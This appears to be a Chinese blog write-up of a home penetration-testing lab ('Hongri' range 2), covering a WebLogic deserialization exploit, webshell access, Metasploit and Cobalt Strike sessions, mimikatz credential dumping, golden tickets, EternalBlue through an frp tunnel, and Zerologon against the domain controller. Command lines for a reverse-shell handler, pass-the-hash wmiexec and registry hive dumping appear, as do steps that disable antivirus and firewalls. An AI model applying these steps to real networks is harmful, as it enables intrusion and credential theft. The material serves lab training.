红日内网渗透靶场2

目录

 

环境搭建:

Web渗透:

weblogic漏洞利用

java反序列化漏洞利用、哥斯拉获取shell

上线msf

msf派生shell到cs

内网信息收集

mimikatz获取用户密码

cs横向移动

PTT攻击(票据传递)

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

cs派生shell给msf

fscan扫描内网

frp搭建socks5隧道代理

永恒之蓝的利用

kiwi获取用户hash

3389远程登录

cve-2020-1472域内提权漏洞的利用

将dc机器账户密码设置为空

wmiexec横向

恢复dc机器账户密码

远程连接域控和pc主机


 

环境搭建:

Web、PC两块网卡,都是nat模式+仅主机模式。DC为仅主机模式。三台主机的默认密码都是1qaz@WSX。

攻击机:kali(nat模式)、win10物理机。

内网网段:10.10.10.1/24

外网网段:192.168.111.1/24

kali:192.168.111.128
web:外:192.168.111.80  内:10.10.10.80
pc:外:192.168.128.201  内:10.10.10.201
dc:10.10.10.10

83ade4f9fd0f4b74b52f3093c1ad7333.png

1e118b623a3748a48b479a12d786d654.png

都进行登录,登录pc之后用管理员账号administrator/1qaz@WSX开启360杀软。

登录web服务器时注意:先登录本地用户WEB/de1ay,密码也是默认的那个密码,然后会提示密码过期 要进行修改,修改完成登录之后进行注销再登录到mssql用户(域用户),也是默认的那个密码,然后用本地管理员账号也就是刚刚修改了密码的那个,开启360杀软,然后以管理员身份运行weblogic服务。

5f819de4211b492d8fb637367ee5d9ef.png

至此,环境就搭建好了。

Web渗透:

Nmap扫描端口开放情况

1b34985335a14aeda4aad9eeebd3b93a.png

开放了多个端口,该靶机的利用点为7001端口

weblogic漏洞利用

看到7001就想到了weblogic,浏览器访问

9321ae4d5bf34eceab030d0f315dabf7.png

访问console目录跳转到weblogic控制台登录页面

ef16840abdd44241b992bcf6c03f3d3e.png

尝试了几个弱口令,没有登录成功,用weblogic专门的扫描工具进行扫描看看存在什么漏洞

f797de7109e7468c8017cfa41654d1f5.png

看到存在java反序列化漏洞,用工具进行上传payload,然后用哥斯拉连接。

java反序列化漏洞利用、哥斯拉获取shell

哥斯拉生成payload

d0e9ad09b48947179010f892b5d93726.png

复制生成的payload内容,用java反序列化漏洞利用工具进行上传

cf4a0d04d67040faa0478dac37666b1e.png

用哥斯拉进行连接

899bc5692c394b0b812ddccf9b51f91b.png

5a59e68265bb4e6baba7ddfacd8a5883.png

上线msf

生成payload反弹shell

7d4d3d3e76f241bb83e6a80e7df67bc7.png

然后通过哥斯拉上传到web服务器(被杀掉的话就考虑生成免杀payload,或者用其他方法攻击),msf开启监听之后再运行

331917ffa8ed46eb95308300d013452d.png

3f47e1ee3d814836933c8a784e7eca96.png

成功反弹shell

msf派生shell到cs

Cs开启监听

c8fba0feba1d45a28a4b668ac47a7557.png

Msf

a70696e6d9334870b98b980d89496875.png

cs上线成功

内网信息收集

shell ipconfig发现内网网段10.10.10.0/24

6f2bf8b56ea54c208122473fbb4b6390.png

Shell ipconfig /all 发现存在域de1ay.com,根据dns服务器判断域控ip为10.10.10.10

9034bce423e54fd09cfe7c72ed9e4980.png

 6d6d7f4463fb42f29c627f35e9474a5c.png

Net config workstation

d6a4c299cfc9493e85aea23ae3488acf.png

进行提权做进一步的信息收集

e283e77e62b74d7894d58c251407aabf.png

点击launch之后提权成功

查询域内用户 net user /domain

80ce8706f97c46f0a654eb25965c5152.png

查询域控 net group “domain controllers” /domain

7e8675facb7f4381b1cdea2fd2984cbc.png

查询域内其他主机名

9580bd81bd3f4f55a0b6eaf0c57e9da5.png

分别ping一下dc和pc拿到ip,域控和之前判断的一样

2a467cdc4c874187821c9e1ddaf4b4ff.png

Ping pc没通  被防火墙拦截了,但也拿到了ip

b8de0549ebf247a0a70099baef227320.png

portscan 探测存活主机+端口扫描

4f9217f77ebc4a1cba8560a758544003.png

256742a094374f5ba9c84374ad57f036.png

发现域控开了445端口。

mimikatz获取用户密码

执行mimikatz获取用户散列值和明文密码

域管理员

58e211c794f744ffa5ad859f39ea5347.png

Web主机本地管理员

283a8eec1bc94284b42574fbe94bfd9a.png

cs横向移动

因为开放了445端口, 创建一个smb监听器,

e051d9754d6741f8ae9d5839ff69c965.png

然后进行psexec横向

8aaa67e90cd143459ac5f9f1bcc88b15.png

执行后就看到成功拿下域控

0c80e3583d3848998e73569d4d687e3e.png

同理对pc进行横向

ce01ed845fff418a8033338f9c0f8aaf.png

 dc273289f2f044748164388c8a472d0a.png

成功拿下pc

a7b2b029146e4b14825f61f3f8564e5d.png

PTT攻击(票据传递)

根据前面用猕猴桃抓取到的用户NTLM HASH和SID值,对黄金票据进行利用

78786720bf354c79aa80ca8db74e0c2a.png

选中administrator权限的web主机 右键 access->golden ticket

14728b27dab741ddb6656776e52a4d46.png

55f08342e540425e8c44ccd59aeda021.png

成功之后进行验证

6635c4ba731e46a5aa3ef1017755676d.png

伪造用户名成功

 

刚刚主要是利用cs进行内网的渗透,接着通过msf进行一个内网的渗透,记录一下。

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

我们可以通过cs来生成一个web delivery,即通过powershell绕过360杀软上线cs

7aaa63ea2e0249f387dbf79c0eb8682b.png

 c42d471f823240aabdbd476d23956eaf.png

然后通过哥斯拉执行powershell上线

6bfd148ab96c4b2c8c0fa8c016cc00e1.png

11d7138b00b74ab3881454dd1b057380.png

成功上线cs

cs派生shell给msf

打开msf,启动handler监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost xxxxxx  

set lport xxxx

run

 

dbe4d8b76af747f6b8ff6a86ad742210.png

cs新建一个外部监听

5d0a76083e084737b9423972c283c58a.png

然后在cs的控制台输入spawn cs-msf

f8861df8a47d47d5bc5d95733e3fdb47.png

msf中成功接收

6129dd733a534319b736283ad1df5149.png

尝试getsystem提权,行不通。

fscan扫描内网

上传fscan到web主机上然后进行扫描

12b7dbf81143413aa162083838418785.png

然后利用fscan扫描内网网段

a078bb3b79ce4f64a3f35980d2a416ed.png

c3da4d8c8c994f76813e60e9ae748d6a.png

发现10和80都存活且都存在永恒之蓝

由于都开了防火墙,所以说远程是打不进去的,尝试用本地流量来打。

frp搭建socks5隧道代理

通过frp建立一个SOCKS隧道

9244668c74c648a4ae981a02664ea6ee.png

上传完之后编辑frpc.ini,改为本地的ip

612c80125fe4494eb9a5069a1ccba485.png

然后现在kali本地启动服务端

dde2106cf6f14d488bb5bc2ca0eca361.png

再运行刚刚上传的客户端

42acdc71a7d94e879dd326fbd1ebd719.png

527dea95dc0c4235ab00b7a708d24450.png

永恒之蓝的利用

然后通过执行命令

setg Proxies socks5:127.0.0.1:8989

Setg ReverseAllowProxy true

 

设置一个全局代理

dbef0cf67d324b838f453dcb946954d5.png

 2f438fd984534c26ab7a168b76a7ad15.png

攻击成功。

kiwi获取用户hash

接着通过kiwi抓取用户密码

Load kiwi

Creds_all

3183bab844454845b13c9ac2d87e0f43.png

12626265765342ca8ac9ce2d08bd1bee.png

拿到了web主机本地用户的用户名和密码以及域用户的用户名和密码。

3389远程登录

最开始的扫描过程中得知了是开了3389端口的,可以进行远程登录一波

修改proxychains的配置文件vi /etc/proxychains.conf

1fd83cc48de44be293f22e9719eef28d.png

然后通过代理进行远程登录

a060c6ce6f2d43c0b0dff2dd3e78ac24.png

2712aca630dc40908d040b92ffcdcc6e.png

由于使用的是本地管理员账户进行登录,所以可以退了杀软,关闭防火墙

3faf7082634c4af298ec9352f74bc65f.png

cve-2020-1472域内提权漏洞的利用

接着对cve-2020-1472域内提权漏洞进行利用(下文相关的exp和poc都可以在github上找到)

由于不知道是否存在该域内提取漏洞,所以先使用github上的poc对dc进行检测是否存在该漏洞

开着代理来执行poc

691807a6e72f433bbece83f5d9a7835e.png

a50c29552ef144129851a4cc26d0534e.png

说明dc存在该漏洞。

将dc机器账户密码设置为空

然后用该漏洞的exp进行攻击,该攻击使得dc机器账户的密码设置为空

91bfa89dc4554eaf934b8b21f91d528f.png

b09ccd91c0c44748b4556c41872df778.png

重置成功

47e22eed20134d45891052c1474a2f1f.png

接着通过impacket包(先apt install python3-impacket)来dump用户hash,linux下$代表变量 所以要加\进行转义

7c381f4d3eab4f00a7c677d7afbba92a.png

拿到域管理员的hash。因为知道了这个的密码强度过高,直接进行解密的话是无法成功的

wmiexec横向

可以通过impacket包的wmiexec进行一个横向

Proxychains impacket-wmiexec -hashes NTLM-HASH ./administrator@10.10.10.10

3a9ea9250c084fc9b37807cd95f279bc.png

成功拿到dc的shell,接下来就是要拷贝dc中SAM数据库到本地,然后提取里面的数据来恢复刚刚我们清空的dc机器账户的密码(这是因为如果机器账户hash长时间为空,可能会导致脱域,对内网的使用产生重大影响,因此拿到权限的第一时间需要把hash重置回去。)

先执行如下三条命令将数据库的三个文件保存到dc本地,然后用get命令进行下载 最后可以在dc中将其删掉

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

 

bea88d5b9bc54d6eb4a0ad9c2ad2ab6f.png

 e184baedab4d496aae833c859e477e07.png

然后可以在靶机中将其删掉

b9be4f5784834d2ba7f2f3326b297b7f.png

恢复密码之前顺便修改一下域管的密码

4dba63bda2e7415680019b787d945370.png

恢复dc机器账户密码

利用impacket-secretsdump提取那三个文件里的数据

2d76257ba3134eee98cbb569e122f7c7.png

然后利用脚本进行恢复

27100291d6684f4dbf38e6c4ea171524.png

 deef4d3e1b5e4ee999f882b163bf0253.png

这时候再用刚刚的impacket-secretsdump -no-pass来dump 用户hash,

bcc6710ac6b34fc8a187c8a3d9ab0d1e.png

发现无法获取了,说明恢复成功

远程连接域控和pc主机

接着在刚刚开启的远程桌面进行远程连接域控 administrator/Admin12345

eb27cdba405a4fdb926f9fcf632aef2e.png

 a1048f402d5642e19ab7ebfc92405060.png

成功连接域控,关闭其防火墙

51e7a8ba6c0f4800ba232adc3fa82eec.png

然后在服务管理器发现域内另外一台机器pc

7a6b3c23c55948f4a6a5c263ac6ffe65.png

再ping一下它就拿到它的ip,再次进行远程登录,开始登录失败了,要以de1ay域的管理员登录才能成功,如下图

f1d668ce25c74d56884fc5b9d7a70a56.png

5fc5e67089084e288f5f7a4c5912c64b.png

同样,把杀软退了和关闭防火墙,防火墙都关了之后就可以正常进行上线了,后续就不展示了(开始用cs上线过)

 

 

最后附一个链接了解cve-2020-1472域内提取漏洞:

https://www.jianshu.com/p/525be0335404

 

 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值